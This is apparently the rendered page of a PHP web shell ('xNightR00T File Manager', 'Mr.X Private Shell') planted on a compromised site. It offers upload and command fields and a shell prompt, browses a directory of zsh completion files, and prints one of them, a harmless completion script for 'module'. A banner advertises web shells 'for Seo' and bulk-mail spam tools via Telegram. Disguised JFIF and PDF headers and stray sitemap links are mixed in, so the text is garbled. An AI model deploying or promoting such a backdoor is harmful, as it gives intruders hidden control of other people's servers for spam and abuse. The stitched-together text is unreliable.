xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#compdef module

# Main dispatcher
_module()
{
  _arguments -s \
    '(-H --help)'{--help,-H}'[display usage info]' \
    '(-V --version)'{--version,-V}'[module command version and configuration options]' \
    '(-f --force)'{--force,-f}'[force active dependency resolution]' \
    '(-t --terse)'{--terse,-t}'[display avail and list output in short format]' \
    '(-l --long)'{--long,-l}'[display avail and list output in long format]' \
    '(-h --human)'{--human,-h}'[display short output in human-readable format]' \
    '(-v --verbose)'{--verbose,-v}'[verbose]' \
    '(-s --silent)'{--silent,-s}'[disable verbose messages]' \
    '(-c --create)'{--create,-c}'[create caches]' \
    '(-i --icase)'{--icase,-i}'[case insensitive]' \
    '(-u --userlvl)'{--userlvl,-u}'[set user level to value]:level:(novice expert advanced)' \
    '*::module command:_module_command'
}

(( $+functions[_module_command] )) || _module_command()
{
  local -a _module_cmds

  _module_cmds=(
    "help:print the usage of each sub-command"
    "load:load a module into the shell environment"
    "add:load a module into the shell environment"
    "unload:remove a module from the shell environment"
    "rm:remove a module from the shell environment"
    "switch:switch loaded a loaded module with another module"
    "swap:switch loaded a loaded module with another module"
    "display:display information about a module"
    "show:display information about a module"
    "list:list loaded modules"
    "avail:list all available modules"
    "use:add a directory to MODULEPATH"
    "unuse:remove a directory from MODULEPATH"
    "update:reload all loaded modules"
    "clear:clear loaded modules information"
    "purge:unload all loaded modules"
    "refresh:refresh all non-persistent components of loaded modules"
    "whatis:display module information"
    "appropos:search for a given keyword in modules"
    "keyword:search for a given keyword in modules"
    "initadd:add or append a module to the user's shell init file"
    "initprepend:add or prepend a module to the user's shell init files"
    "initrm:remove a module from the user's shell init file"
    "initswitch:switch modules in the user's shell init file"
    "initlist:list all loaded modules in the user's shell init files"
    "initclear:clear all modules from the user's shell init files"
  )

  if (( CURRENT == 1 )); then
    _describe -t commands 'module command' _module_cmds || compadd "$@"
  else
    local curcontext="$curcontext"

    cmd="${${_module_cmds[(r)$words[1]:*]%%:*}}"
    # Deal with any aliases
    case $cmd in
      add) cmd="load";;
      rm) cmd="unload";;
      swap) cmd="switch";;
      show) cmd="display";;
      keyword) cmd="apropos";;
    esac
                
    if (( $#cmd ));
    then
      local update_policy
      curcontext="${curcontext%:*:*}:module-${cmd}:"
      zstyle -s ":completion:${curcontext}:" cache-policy update_policy
      _call_function ret _module_$cmd || _message 'no more arguments'
    else
      _message "unknown module command: $words[1]"
    fi

    return ret
  fi
}

# Fills the available modules cache
_module_available_modules()
{
  if [[ -n $MODULEPATH ]] && [[ ${+_available_modules} -eq 0 ]]
  then
    _available_modules=(${$(find ${(e)=MODULEPATH//:/ } -xtype f -print 2>/dev/null | grep -v \\.version | sed -e 's,\('${${(e)=MODULEPATH//:/\/\\\|}%\\\|}'\),,g' -e 's,^/*,,g'):#*\~})
  fi
}

# Completion function for help
(( $+functions[_module_help] )) || _module_help()
{
  _module_available_modules
  compadd "$@" -a -- _available_modules
}

# Completion function for load|add
(( $+functions[_module_load] )) || _module_load()
{
  _module_available_modules
  compadd "$@" -a -- _available_modules
}

# Completion function for unload|rm
(( $+functions[_module_unload] )) || _module_unload()
{
  compadd "$@" -- ${=LOADEDMODULES//:/ }
}

# Completion function for switch|swap
(( $+functions[_module_switch] )) || _module_switch()
{
  # Actually first argument could be a loaded module
  _module_available_modules
  compadd "$@" -a -- _available_modules
}

# Completion function for display|show
(( $+functions[_module_display] )) || _module_display()
{
  _module_available_modules
  compadd "$@" -a -- _available_modules
}

# Completion function for avail
### No completion (yet?)

# Completion function for use
(( $+functions[_module_use] )) || _module_use()
{
  _arguments -s \
    '(-a --append)'{--append,-a}'[append the directories instead of prepending]' \
    '*:directory:_files -/'    
}

# Completion function for unuse
(( $+functions[_module_unuse] )) || _module_unuse()
{
  compadd "$@" -- ${=MODULEPATH//:/ }
}

# Completion function for whatis
(( $+functions[_module_whatis] )) || _module_whatis()
{
  _module_available_modules
  compadd "$@" -a -- _available_modules
}

# Completion function for initadd
(( $+functions[_module_initadd] )) || _module_initadd()
{
  _module_available_modules
  compadd "$@" -a -- _available_modules
}

# Completion function for initprepend
(( $+functions[_module_initprepend] )) || _module_initprepend()
{
  _module_available_modules
  compadd "$@" -a -- _available_modules
}

# Completion function for initrm
(( $+functions[_module_initrm] )) || _module_initrm()
{
  _module_available_modules
  compadd "$@" -a -- _available_modules
}

# Completion function for initswitch
(( $+functions[_module_initswitch] )) || _module_initswitch()
{
  _module_available_modules
  compadd "$@" -a -- _available_modules
}

_module "$@"

Filemanager

Name Type Size Permission Actions
_a2ps File 2.74 KB 0644
_aap File 2.58 KB 0644
_adb File 15.02 KB 0644
_ant File 5.96 KB 0644
_antiword File 1.08 KB 0644
_apachectl File 116 B 0644
_apm File 1.64 KB 0644
_arch_archives File 413 B 0644
_arch_namespace File 3.23 KB 0644
_arp File 1.14 KB 0644
_arping File 1.32 KB 0644
_at File 969 B 0644
_attr File 2.24 KB 0644
_awk File 975 B 0644
_baz File 15.64 KB 0644
_bind_addresses File 416 B 0644
_bison File 923 B 0644
_bittorrent File 4.8 KB 0644
_bogofilter File 5.17 KB 0644
_bzip2 File 2.17 KB 0644
_bzr File 10.53 KB 0644
_cal File 547 B 0644
_calendar File 1.37 KB 0644
_canonical_paths File 4.1 KB 0644
_cat File 1.41 KB 0644
_ccal File 778 B 0644
_cdcd File 2.09 KB 0644
_cdrdao File 8.06 KB 0644
_cdrecord File 4.75 KB 0644
_chkconfig File 777 B 0644
_chmod File 2.22 KB 0644
_chown File 2.48 KB 0644
_clay File 1.72 KB 0644
_comm File 409 B 0644
_compress File 1.38 KB 0644
_configure File 444 B 0644
_cowsay File 535 B 0644
_cp File 3.56 KB 0644
_cpio File 4.55 KB 0644
_cplay File 343 B 0644
_cssh File 795 B 0644
_ctags_tags File 170 B 0644
_cut File 2.3 KB 0644
_cvs File 28.27 KB 0644
_darcs File 1.17 KB 0644
_date File 1.11 KB 0644
_dbus File 3.46 KB 0644
_dd File 812 B 0644
_devtodo File 4.53 KB 0644
_df File 2.95 KB 0644
_dhclient File 925 B 0644
_dict File 2.09 KB 0644
_dict_words File 1.26 KB 0644
_diff File 90 B 0644
_diff_options File 6.98 KB 0644
_diffstat File 727 B 0644
_dir_list File 680 B 0644
_directories File 117 B 0644
_django File 5.86 KB 0644
_dmidecode File 935 B 0644
_domains File 585 B 0644
_du File 4.06 KB 0644
_dvi File 3.94 KB 0644
_ecasound File 8.38 KB 0644
_elinks File 2.89 KB 0644
_elm File 653 B 0644
_email_addresses File 5.32 KB 0644
_enscript File 5.24 KB 0644
_env File 429 B 0644
_espeak File 2.03 KB 0644
_etags File 2.08 KB 0644
_fakeroot File 486 B 0644
_feh File 6.85 KB 0644
_fetchmail File 554 B 0644
_ffmpeg File 8.16 KB 0644
_figlet File 1.47 KB 0644
_file_systems File 1.14 KB 0644
_files File 3.93 KB 0644
_find File 3 KB 0644
_finger File 2.11 KB 0644
_flasher File 1.62 KB 0644
_flex File 1.42 KB 0644
_fortune File 601 B 0644
_fsh File 519 B 0644
_fuser File 2.06 KB 0644
_gcc File 11.81 KB 0644
_gdb File 1.68 KB 0644
_genisoimage File 1.96 KB 0644
_getconf File 2.16 KB 0644
_getent File 1.61 KB 0644
_getfacl File 1.34 KB 0644
_getmail File 1.05 KB 0644
_git File 282.06 KB 0644
_global File 1.81 KB 0644
_global_tags File 186 B 0644
_gnu_generic File 178 B 0644
_gnupod File 5.57 KB 0644
_gnutls File 6.1 KB 0644
_go File 256 B 0644
_gpg File 12.99 KB 0644
_gphoto2 File 2.45 KB 0644
_gprof File 1.31 KB 0644
_gradle File 6.82 KB 0644
_graphicsmagick File 28.2 KB 0644
_grep File 3.98 KB 0644
_groff File 2.2 KB 0644
_groups File 1009 B 0644
_growisofs File 19.16 KB 0644
_gs File 1.58 KB 0644
_guilt File 1.52 KB 0644
_gzip File 3.52 KB 0644
_have_glob_qual File 910 B 0644
_hg File 29.08 KB 0644
_hosts File 2.63 KB 0644
_iconv File 2.55 KB 0644
_id File 453 B 0644
_ifconfig File 2.8 KB 0644
_iftop File 665 B 0644
_imagemagick File 27.45 KB 0644
_init_d File 2.55 KB 0644
_initctl File 6.18 KB 0644
_ip File 19.66 KB 0644
_irssi File 1.38 KB 0644
_ispell File 4.11 KB 0644
_java File 22.96 KB 0644
_java_class File 693 B 0644
_joe File 2.22 KB 0644
_join File 933 B 0644
_killall File 365 B 0644
_knock File 304 B 0644
_kvno File 566 B 0644
_last File 472 B 0644
_ld_debug File 1.14 KB 0644
_ldd File 1.3 KB 0644
_less File 5.54 KB 0644
_lha File 1.77 KB 0644
_links File 2.04 KB 0644
_list_files File 1.39 KB 0644
_ln File 2.96 KB 0644
_loadkeys File 595 B 0644
_locales File 349 B 0644
_locate File 4.5 KB 0644
_look File 444 B 0644
_lp File 8.08 KB 0644
_ls File 5.94 KB 0644
_lsof File 2.32 KB 0644
_lynx File 10.9 KB 0644
_lzop File 3.75 KB 0644
_mail File 432 B 0644
_mailboxes File 5.88 KB 0644
_make File 8.43 KB 0644
_man File 3.25 KB 0644
_md5sum File 457 B 0644
_mencal File 1.06 KB 0644
_metaflac File 1.42 KB 0644
_mh File 3.51 KB 0644
_mime_types File 1.13 KB 0644
_mkdir File 1.86 KB 0644
_module File 5.37 KB 0644
_monotone File 2.45 KB 0644
_mosh File 372 B 0644
_mount File 40.42 KB 0644
_mpc File 6.46 KB 0644
_mt File 3.14 KB 0644
_mtools File 3.99 KB 0644
_mtr File 725 B 0644
_mutt File 1.28 KB 0644
_my_accounts File 45 B 0644
_mysql_utils File 9.75 KB 0644
_mysqldiff File 1.1 KB 0644
_ncftp File 280 B 0644
_net_interfaces File 1.03 KB 0644
_netcat File 1.29 KB 0644
_newsgroups File 210 B 0644
_nice File 246 B 0644
_nkf File 2.1 KB 0644
_nm File 731 B 0644
_nmap File 3.38 KB 0644
_notmuch File 1.63 KB 0644
_npm File 529 B 0644
_nslookup File 5.54 KB 0644
_other_accounts File 64 B 0644
_pack File 361 B 0644
_patch File 7.95 KB 0644
_path_commands File 2.77 KB 0644
_path_files File 26.93 KB 0644
_pax File 2.72 KB 0644
_pbm File 25.25 KB 0644
_pdf File 423 B 0644
_perforce File 86.14 KB 0644
_perl File 5.21 KB 0644
_perl_basepods File 716 B 0644
_perl_modules File 4.56 KB 0644
_perldoc File 2.28 KB 0644
_pgrep File 2.09 KB 0644
_php File 2.99 KB 0644
_pids File 1.59 KB 0644
_pine File 2.88 KB 0644
_ping File 1.69 KB 0644
_pkg-config File 2.11 KB 0644
_pkg_instance File 353 B 0644
_pkgadd File 1012 B 0644
_pkginfo File 613 B 0644
_pkgrm File 551 B 0644
_pon File 443 B 0644
_ports File 285 B 0644
_postfix File 530 B 0644
_postscript File 333 B 0644
_prcs File 6.69 KB 0644
_printenv File 104 B 0644
_printers File 3.13 KB 0644
_prove File 2.25 KB 0644
_ps1234 File 3.34 KB 0644
_pspdf File 341 B 0644
_psutils File 3.69 KB 0644
_pump File 1.41 KB 0644
_pydoc File 436 B 0644
_python File 2.03 KB 0644
_qemu File 2.49 KB 0644
_quilt File 9.81 KB 0644
_raggle File 2.68 KB 0644
_rake File 2.78 KB 0644
_ranlib File 403 B 0644
_rar File 4.51 KB 0644
_rcs File 766 B 0644
_remote_files File 2.47 KB 0644
_renice File 424 B 0644
_ri File 3.72 KB 0644
_rlogin File 1.81 KB 0644
_rm File 1.53 KB 0644
_rrdtool File 491 B 0644
_rsync File 12.41 KB 0644
_rubber File 2.64 KB 0644
_ruby File 2.84 KB 0644
_sablotron File 1.77 KB 0644
_samba File 3.36 KB 0644
_sccs File 6.04 KB 0644
_screen File 6.6 KB 0644
_sed File 1.07 KB 0644
_service File 1.02 KB 0644
_services File 951 B 0644
_setfacl File 1.96 KB 0644
_sh File 547 B 0644
_showmount File 428 B 0644
_signals File 1013 B 0644
_sisu File 3.84 KB 0644
_slrn File 1.1 KB 0644
_socket File 1.06 KB 0644
_sort File 2.74 KB 0644
_spamassassin File 475 B 0644
_sqlite File 1.55 KB 0644
_sqsh File 2.11 KB 0644
_ssh File 21.46 KB 0644
_stgit File 952 B 0644
_strip File 2.31 KB 0644
_stty File 762 B 0644
_su File 1.9 KB 0644
_subversion File 10.19 KB 0644
_sudo File 1.13 KB 0644
_surfraw File 17.72 KB 0644
_sysctl File 1.67 KB 0644
_systemd File 16.49 KB 0644
_tar File 5.97 KB 0644
_tar_archive File 1014 B 0644
_tardy File 678 B 0644
_tcpdump File 4.2 KB 0644
_tcptraceroute File 583 B 0644
_telnet File 2.84 KB 0644
_terminals File 230 B 0644
_tex File 1.92 KB 0644
_texi File 129 B 0644
_texinfo File 8.52 KB 0644
_tidy File 7.13 KB 0644
_tiff File 7.06 KB 0644
_tilde_files File 676 B 0644
_time_zone File 222 B 0644
_tin File 2.07 KB 0644
_tla File 17.58 KB 0644
_tmux File 49.02 KB 0644
_todo.sh File 4.07 KB 0644
_toilet File 863 B 0644
_topgit File 177 B 0644
_totd File 287 B 0644
_tracepath File 87 B 0644
_tree File 1.87 KB 0644
_twidge File 1.67 KB 0644
_twisted File 1.37 KB 0644
_unace File 472 B 0644
_uname File 2.5 KB 0644
_unexpand File 620 B 0644
_uniq File 1.35 KB 0644
_unison File 5.39 KB 0644
_units File 2.75 KB 0644
_urls File 5.91 KB 0644
_user_admin File 1.9 KB 0644
_user_at_host File 729 B 0644
_users File 251 B 0644
_users_on File 253 B 0644
_uzbl File 304 B 0644
_vcsh File 2.86 KB 0644
_vim File 5.34 KB 0644
_vorbis File 5.57 KB 0644
_vorbiscomment File 617 B 0644
_vux File 1.77 KB 0644
_w3m File 4.42 KB 0644
_webbrowser File 210 B 0644
_wget File 8.08 KB 0644
_whereis File 36 B 0644
_whois File 4.71 KB 0644
_wiggle File 1.09 KB 0644
_xargs File 502 B 0644
_xmlsoft File 6.47 KB 0644
_xmms2 File 5.26 KB 0644
_xz File 4.1 KB 0644
_yafc File 1.8 KB 0644
_yodl File 658 B 0644
_yp File 3.17 KB 0644
_zcat File 99 B 0644
_zdump File 112 B 0644
_zfs File 17.83 KB 0644
_zfs_dataset File 2.56 KB 0644
_zfs_keysource_props File 408 B 0644
_zfs_pool File 51 B 0644
_zip File 5.25 KB 0644
_zpool File 8.96 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml